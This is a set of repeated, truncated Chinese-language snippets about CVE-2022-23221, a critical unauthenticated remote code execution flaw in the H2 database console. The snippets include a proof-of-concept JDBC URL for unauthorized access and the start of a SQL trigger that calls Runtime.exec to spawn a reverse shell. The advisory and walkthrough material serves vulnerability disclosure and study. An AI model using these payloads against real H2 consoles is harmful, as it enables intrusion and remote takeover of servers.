jdbc:h2:mem:test1;FORBID_CREATION=FALSE;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;\ RCE执行反弹 -创建数据库文件:h2database.sql CREATE TABLE test ( id INT NOT NULL ); CREATE TRIGGER TRIG_JS BEFORE INSERT ON TEST AS'//javascriptJava.type("java.lang.Runtime").getRuntime().exec("b...
漏洞编号:CVE-2022-23221 漏洞归属组件:hetu-core 漏洞归属的版本:1.4.199 CVSS V3.0分值: BaseScore:9.8 Critical Vector:CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 漏洞简述: H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL ...
1、未授权进入数据库 (1)POC: jdbc:h2:mem:test1;FORBID_CREATION=FALSE;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;\ (2)成功进入数据库 2、RCE执行反弹shell (1)攻击机创建数据库文件:h2database.sql CREATE TABLE test ( id INT NOT NULL ); CREATE TRIGGER TRIG_JS BEFORE INSERT ON TEST AS...
1、未授权进入数据库 (1)POC: jdbc:h2:mem:test1;FORBID_CREATION=FALSE;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;\ (2)成功进入数据库 2、RCE执行反弹shell (1)攻击机创建数据库文件:h2database.sql CREATE TABLE test ( id INT NOT NULL ); CREATE TRIGGER TRIG_JS BEFORE INSERT ON TEST AS...
H2database CVE-2022-23221 命令执行 漏洞概述 Java SQL 数据库 H2,H2的主要特点是:非常快,开源,JDBC API;嵌入式和服务器模式;内存数据库;基于浏览器的控制台应用程序。H2 数据库控制台中的另一个未经身份验证的 RCE 漏洞,在v2.1.210+中修复。2.1.210 之前的H2控制台允许远程攻击者通过包含子字符串的jdbc...